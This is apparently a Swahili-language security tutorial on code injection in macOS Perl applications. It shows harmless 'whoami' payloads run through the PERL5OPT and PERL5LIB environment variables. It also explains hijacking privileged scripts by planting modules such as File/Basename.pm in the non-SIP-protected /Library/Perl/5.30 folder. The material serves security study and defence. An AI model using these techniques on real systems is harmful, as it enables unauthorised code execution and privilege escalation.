macOS Perl Applications Injection

Kupitia PERL5OPT & PERL5LIB env variable

Kwa kutumia mazingira ya kipekee ya PERL5OPT, inawezekana kufanya perl itekeleze amri za kupindukia. Kwa mfano, unda script hii:

#!/usr/bin/perl
print "Hello from the Perl script!\n";

Sasa tengeneza mazingira ya env na tekeleza skripti ya perl:

export PERL5OPT='-Mwarnings;system("whoami")'
perl test.pl # This will execute "whoami"

Chaguo lingine ni kuunda moduli ya Perl (k.m. /tmp/pmod.pm):

#!/usr/bin/perl
package pmod;
system('whoami');
1; # Modules must return a true value

Na kisha tumia mazingira ya env:

PERL5LIB=/tmp/ PERL5OPT=-Mpmod

Kupitia tegemezi

Inawezekana kuorodhesha folda za tegemezi kwa mpangilio wa Perl unapoendesha:

perl -e 'print join("\n", @INC)'

Ambayo itarudisha kitu kama:

/Library/Perl/5.30/darwin-thread-multi-2level
/Library/Perl/5.30
/Network/Library/Perl/5.30/darwin-thread-multi-2level
/Network/Library/Perl/5.30
/Library/Perl/Updates/5.30.3
/System/Library/Perl/5.30/darwin-thread-multi-2level
/System/Library/Perl/5.30
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
/System/Library/Perl/Extras/5.30

Baadhi ya folda zilizorudishwa hazipo, hata hivyo, /Library/Perl/5.30 ipo, haikilindwi na SIP na iko kabla ya folda zilizolindwa na SIP. Kwa hivyo, mtu anaweza kutumia folda hiyo kuongeza mahitaji ya script ili script ya Perl yenye mamlaka makubwa iweze kuijumuisha.

Kwa mfano, ikiwa script inaingiza use File::Basename; ingewezekana kuunda /Library/Perl/5.30/File/Basename.pm ili kufanya iendeshe nambari ya kupendelea.

Marejeo

• https://www.youtube.com/watch?v=zxZesAN-TEk